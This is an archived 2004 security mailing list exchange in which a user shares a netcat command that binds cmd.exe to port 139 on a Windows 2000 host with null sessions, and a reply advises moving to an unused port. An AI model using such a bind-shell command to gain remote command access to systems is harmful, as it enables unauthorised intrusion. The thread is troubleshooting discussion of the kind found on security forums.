Security Basics mailing list archives

Re: nc help needed.

From: mike () genxweb net
Date: Fri, 24 Sep 2004 08:03:07 -0400

The issue looks like that port 139 is in use. it cannot bind your shell to port
139. That port is used for netbios traffic along with a few others. Try to use
a open port.

Quoting Vijay Kumar <vijay () calsoftinc com>:

Hi,

Trying to use the nc command from a windows 2k box :

nc -v -L -e cmd.exe -p 139 -s xxx.xxx.xxx.xxx

The error given is :  Can't grab xxx.xxx.xxx.xxx:139 with bind.

s -> destination host where the null sessions on 139 are accepted.

Any clue, how to to get the cmd working on the remote host ?

Regards,
Vijay.

Computer Forensics Training at the InfoSec Institute. All of our class sizes
are guaranteed to be 12 students or less to facilitate one-on-one
interaction with one of our expert instructors. Gain the in-demand skills of
a certified computer examiner, learn to recover trace data left behind by
fraud, theft, and cybercrime perpetrators. Discover the source of computer
crime and abuse so that it never happens again.

http://www.infosecinstitute.com/courses/computer_forensics_training.html